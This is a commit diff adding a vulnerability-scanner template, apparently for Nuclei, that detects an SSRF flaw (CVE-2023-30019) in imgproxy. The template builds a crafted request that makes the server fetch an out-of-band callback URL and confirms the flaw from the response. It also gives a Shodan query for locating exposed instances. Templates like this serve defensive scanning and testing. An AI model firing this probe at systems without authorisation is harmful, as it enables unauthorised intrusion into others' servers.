commit
724da9a377
|
@ -0,0 +1,39 @@
|
|||
id: CVE-2023-30019
|
||||
|
||||
info:
|
||||
name: imgproxy <= 3.14.0 - Server-side request forgery (SSRF)
|
||||
author: DhiyaneshDK
|
||||
severity: medium
|
||||
description: |
|
||||
imgproxy <=3.14.0 is vulnerable to Server-Side Request Forgery (SSRF) due to a lack of sanitization of the imageURL parameter.
|
||||
reference:
|
||||
- https://breakandpray.com/cve-2023-30019-ssrf-in-imgproxy/
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
|
||||
cvss-score: 5.3
|
||||
cwe-id: CWE-918
|
||||
metadata:
|
||||
max-request: 1
|
||||
verified: "true"
|
||||
shodan-query: "Server: imgproxy"
|
||||
tags: cve,cve2023,imgproxy,ssrf,oast
|
||||
|
||||
http:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/111/rs:fit:400:400:0:0/plain/http://{{interactsh-url}}'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- 'Invalid source image'
|
||||
|
||||
- type: word
|
||||
part: interactsh_protocol
|
||||
words:
|
||||
- "http"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 422
|
Loading…
Reference in New Issue